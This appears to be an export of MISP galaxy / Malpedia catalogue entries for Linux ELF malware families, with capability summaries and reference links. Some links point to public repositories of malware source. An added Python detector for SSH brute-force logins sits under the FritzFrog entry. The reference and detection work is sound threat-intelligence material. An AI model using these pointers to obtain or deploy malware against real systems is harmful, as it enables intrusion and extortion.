Table 2312. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.sygnia.co/mata-framework

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

DarkSide (ELF)

The tag is: misp-galaxy:malpedia="DarkSide (ELF)"

DarkSide (ELF) is also known as:

Table 2315. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside

https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/

https://pylos.co/2021/05/13/mind-the-air-gap/

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version

https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.youtube.com/watch?v=NIiEcOryLpI

https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://therecord.media/popular-hacking-forum-bans-ransomware-ads/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html

https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside

https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access

https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/

https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://twitter.com/JAMESWT_MHT/status/1388301138437578757

https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/

https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/

https://www.ic3.gov/Media/News/2021/211101.pdf

https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/

https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted

https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/

https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9

https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

ddoor

The tag is: misp-galaxy:malpedia="ddoor"

ddoor is also known as:

Table 2318. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor

https://github.com/rek7/ddoor

DEADBOLT

DEADBOLT is Linux ransomware written in Go that targets QNAP NAS devices worldwide. Files are encrypted with AES-128 and the .deadbolt extension is appended to their names.

The tag is: misp-galaxy:malpedia="DEADBOLT"

DEADBOLT is also known as:

Table 2319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt

https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/

https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html

https://community.riskiq.com/article/1601124b

https://securelist.com/new-ransomware-trends-in-2022/106457/

Denonia

Cado discovered this malware, written in Go and targeting AWS Lambda environments.

The tag is: misp-galaxy:malpedia="Denonia"

Denonia is also known as:

Table 2320. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia

https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

Dofloo

Dofloo (aka AESDDoS) is a popular malware used to build large-scale botnets that launch DDoS attacks and load cryptocurrency miners onto the infected machines.

The tag is: misp-galaxy:malpedia="Dofloo"

Dofloo is also known as:

  • AESDDoS

Table 2322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo

Echobot

Echobot is a Mirai variant. It appeared in mid-May 2019 and was first described by Palo Alto Networks in a report published at the start of June, and then again by Akamai researchers in mid-June.

When Palo Alto Networks researchers first spotted it in early June, Echobot was using exploits for 18 vulnerabilities; in the Akamai report a week later, it was at 26.

The tag is: misp-galaxy:malpedia="Echobot"

Echobot is also known as:

Table 2327. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot

https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada

https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/

https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html

https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/

EnemyBot

According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.

The tag is: misp-galaxy:malpedia="EnemyBot"

EnemyBot is also known as:

Table 2328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory

https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/

https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

EvilGnome

According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.

The tag is: misp-galaxy:malpedia="EvilGnome"

EvilGnome is also known as:

Table 2331. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome

https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf

EwDoor

The tag is: misp-galaxy:malpedia="EwDoor"

EwDoor is also known as:

Table 2332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ewdoor

https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/

Facefish

The tag is: misp-galaxy:malpedia="Facefish"

Facefish is also known as:

Table 2335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.facefish

https://blog.netlab.360.com/ssh_stealer_facefish_en/

floodor

The tag is: misp-galaxy:malpedia="floodor"

floodor is also known as:

Table 2338. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor

https://github.com/Thibault-69/Floodor

FontOnLake

This family uses custom modules for remote access, credential harvesting (e.g. by modifying sshd) and proxying.

It also ships with a rootkit.

The tag is: misp-galaxy:malpedia="FontOnLake"

FontOnLake is also known as:

Table 2340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.fontonlake

https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/

FritzFrog

Guardicore discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet that has been actively breaching SSH servers since January 2020. It is a worm written in Go; it is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

The tag is: misp-galaxy:malpedia="FritzFrog"

FritzFrog is also known as:

Table 2341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog

https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/

https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.akamai.com/blog/security/fritzfrog-p2p
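FritzFrog's foothold is SSH brute force, so the earliest host-side evidence is a burst of failed logins from one source followed by an accepted login from the same source. The detector below is an added example, not code from Guardicore, Akamai or Malpedia: it parses standard sshd auth-log lines, counts failures per source in a sliding window, and reports the first success after a burst. The log lines are constructed (TEST-NET addresses), and because syslog timestamps carry no year one is assumed.

```python
"""Spot SSH brute-forcing, and the success that follows it, in sshd auth-log lines.
Added example; the sample log is constructed."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+ ssh2"
)


def parse(line: str, year: int = 2020):
    """Return (timestamp, outcome, user, ip) or None for non-auth lines.
    Syslog lines carry no year, so one must be supplied (assumed 2020 here)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["outcome"], m["user"], m["ip"]


def detect(lines, window_s: int = 600, fail_threshold: int = 10):
    """Per source IP: report a brute-force burst (>= fail_threshold failures inside
    window_s seconds) and the first accepted login that follows such a burst."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev:
            by_ip[ev[3]].append(ev)
    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        recent, users, burst = [], set(), False
        for ts, outcome, user, _ in events:
            if outcome == "Failed":
                users.add(user)
                recent = [t for t in recent if (ts - t).total_seconds() <= window_s] + [ts]
                if not burst and len(recent) >= fail_threshold:
                    burst = True
                    findings.append({"ip": ip, "kind": "brute-force", "at": ts,
                                     "distinct_users": len(users)})
            elif burst:   # Accepted after a burst: treat as a likely compromise
                findings.append({"ip": ip, "kind": "success-after-burst", "at": ts, "user": user})
                break
    return findings


# Constructed sample: 12 failures in 12 seconds from 203.0.113.5 spraying common
# usernames, then an accepted password for root; 192.0.2.10 is a user's typo.
_SPRAY = ["admin", "admin", "ubuntu", "pi", "oracle", "test",
          "root", "root", "root", "git", "postgres", "root"]
SAMPLE_LOG = [
    f"Jan 12 03:14:{i:02d} bastion sshd[{2200 + i}]: Failed password for "
    f"{'' if u == 'root' else 'invalid user '}{u} from 203.0.113.5 port {51200 + i} ssh2"
    for i, u in enumerate(_SPRAY)
] + [
    "Jan 12 03:14:30 bastion sshd[2290]: Accepted password for root from 203.0.113.5 port 51260 ssh2",
    "Jan 12 03:20:05 bastion sshd[2301]: Failed password for alice from 192.0.2.10 port 40010 ssh2",
    "Jan 12 03:20:11 bastion sshd[2302]: Accepted publickey for alice from 192.0.2.10 port 40011 ssh2",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Feed it `journalctl -u ssh -o short` or /var/log/auth.log; a "success-after-burst" finding is the point at which to pull the host's authorized_keys files and running processes, since FritzFrog's next steps happen in memory.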

Gitpaste-12

Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.

The tag is: misp-galaxy:malpedia="Gitpaste-12"

Gitpaste-12 is also known as:

Table 2342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12

https://blogs.juniper.net/en-us/threat-research/gitpaste-12

Glupteba Proxy

ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.

The tag is: misp-galaxy:malpedia="Glupteba Proxy"

Glupteba Proxy is also known as:

Table 2343. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.glupteba_proxy

https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

GobRAT

The tag is: misp-galaxy:malpedia="GobRAT"

GobRAT is also known as:

Table 2344. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

Godlua

The tag is: misp-galaxy:malpedia="Godlua"

Godlua is also known as:

Table 2345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua

https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/

GOSH

The tag is: misp-galaxy:malpedia="GOSH"

GOSH is also known as:

Table 2346. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh

https://twitter.com/IntezerLabs/status/1291355808811409408

GoTitan

GoTitan is a DDoS bot still under development. Fortinet reports support for ten different methods of launching distributed denial-of-service (DDoS) attacks, of which nine are named: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD and HTTP PUT.

The tag is: misp-galaxy:malpedia="GoTitan"

GoTitan is also known as:

Table 2347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gotitan

https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq

GreedyAntd

The tag is: misp-galaxy:malpedia="GreedyAntd"

GreedyAntd is also known as:

Table 2348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

HabitsRAT (ELF)

The tag is: misp-galaxy:malpedia="HabitsRAT (ELF)"

HabitsRAT (ELF) is also known as:

Table 2350. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.habitsrat

https://twitter.com/michalmalik/status/1435918937162715139

HandyMannyPot

The tag is: misp-galaxy:malpedia="HandyMannyPot"

HandyMannyPot is also known as:

Table 2354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot

https://twitter.com/liuya0904/status/1171633662502350848

HiatusRAT

Lumen discovered this malware in a campaign targeting business-grade routers; the campaign deploys a RAT that Lumen calls HiatusRAT together with a variant of tcpdump used for traffic interception.

The tag is: misp-galaxy:malpedia="HiatusRAT"

HiatusRAT is also known as:

Table 2358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat

https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/

https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/

HiddenWasp

HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.

The tag is: misp-galaxy:malpedia="HiddenWasp"

HiddenWasp is also known as:

Table 2359. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

HinataBot

HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.

The tag is: misp-galaxy:malpedia="HinataBot"

HinataBot is also known as:

Table 2361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot

https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet

Hipid

The tag is: misp-galaxy:malpedia="Hipid"

Hipid is also known as:

Table 2362. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hipid

https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html

Hive (ELF)

The tag is: misp-galaxy:malpedia="Hive (ELF)"

Hive (ELF) is also known as:

Table 2363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive

https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/

https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://arxiv.org/pdf/2202.08477.pdf

https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://twitter.com/ESETresearch/status/1454100591261667329

https://twitter.com/malwrhunterteam/status/1455628865229950979

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://github.com/reecdeep/HiveV5_file_decryptor

https://github.com/rivitna/Malware/tree/main/Hive

https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html

https://blog.group-ib.com/hive

Horse Shell

Check Point Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:

  • Remote shell: Execution of arbitrary shell commands on the infected router

  • File transfer: Upload and download files to and from the infected router.

  • SOCKS tunneling: Relay communication between different clients.

The tag is: misp-galaxy:malpedia="Horse Shell"

Horse Shell is also known as:

Table 2364. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell

https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/

Hubnr

The tag is: misp-galaxy:malpedia="Hubnr"

Hubnr is also known as:

Table 2365. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hubnr

https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet

HyperSSL (ELF)

The tag is: misp-galaxy:malpedia="HyperSSL (ELF)"

HyperSSL (ELF) is also known as:

  • SysUpdate

Table 2366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hyperssl

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

Icnanker

The tag is: misp-galaxy:malpedia="Icnanker"

Icnanker is also known as:

Table 2368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker

https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/

IZ1H9

According to Fortinet, this is a Mirai-based DDoS botnet.

The tag is: misp-galaxy:malpedia="IZ1H9"

IZ1H9 is also known as:

Table 2372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.iz1h9

https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits

JenX

The tag is: misp-galaxy:malpedia="JenX"

JenX is also known as:

Table 2373. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx

https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/

Kaiji

Kaiji surfaced in late April 2020; Intezer describes it as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting at its origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

The tag is: misp-galaxy:malpedia="Kaiji"

Kaiji is also known as:

Table 2374. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/

https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Kaiten

According to Netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer, allowing it to perform other malicious activities. The trojan does not create any copies of itself. This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

The tag is: misp-galaxy:malpedia="Kaiten"

Kaiten is also known as:

  • STD

Table 2375. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten

https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html

https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf

https://www.lacework.com/blog/the-kek-security-network/

https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/

https://www.lacework.com/the-kek-security-network/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day

kfos

The tag is: misp-galaxy:malpedia="kfos"

kfos is also known as:

Table 2378. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kfos

https://twitter.com/r3dbU7z/status/1378564694462586880

Kinsing

The tag is: misp-galaxy:malpedia="Kinsing"

Kinsing is also known as:

  • h2miner

Table 2379. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://unit42.paloaltonetworks.com/atoms/moneylibra/

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces

https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://twitter.com/IntezerLabs/status/1259818964848386048

https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html

https://redcanary.com/blog/kinsing-malware-citrix-saltstack/

https://unit42.paloaltonetworks.com/cve-2020-25213/

https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability

https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743

Krasue RAT

The tag is: misp-galaxy:malpedia="Krasue RAT"

Krasue RAT is also known as:

Table 2382. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.krasue_rat

https://www.group-ib.com/blog/krasue-rat/

Lady

The tag is: misp-galaxy:malpedia="Lady"

Lady is also known as:

Table 2383. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady

https://news.drweb.com/news/?i=10140&lng=en

LeetHozer

The tag is: misp-galaxy:malpedia="LeetHozer"

LeetHozer is also known as:

Table 2384. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer

https://blog.netlab.360.com/the-leethozer-botnet-en/

Lightning Framework

The tag is: misp-galaxy:malpedia="Lightning Framework"

Lightning Framework is also known as:

Table 2385. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lightning

https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/

lilyofthevalley

The tag is: misp-galaxy:malpedia="lilyofthevalley"

lilyofthevalley is also known as:

Table 2387. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley

https://github.com/En14c/LilyOfTheValley

LiquorBot

Bitdefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.

The tag is: misp-galaxy:malpedia="LiquorBot"

LiquorBot is also known as:

Table 2388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot

https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/

https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/

LockBit (ELF)

The tag is: misp-galaxy:malpedia="LockBit (ELF)"

LockBit (ELF) is also known as:

Table 2389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit

https://security.packt.com/understanding-lockbit/

https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/

https://blog.compass-security.com/2022/03/vpn-appliance-forensics/

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf

https://www.ic3.gov/Media/News/2022/220204.pdf

https://analyst1.com/ransomware-diaries-volume-1/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

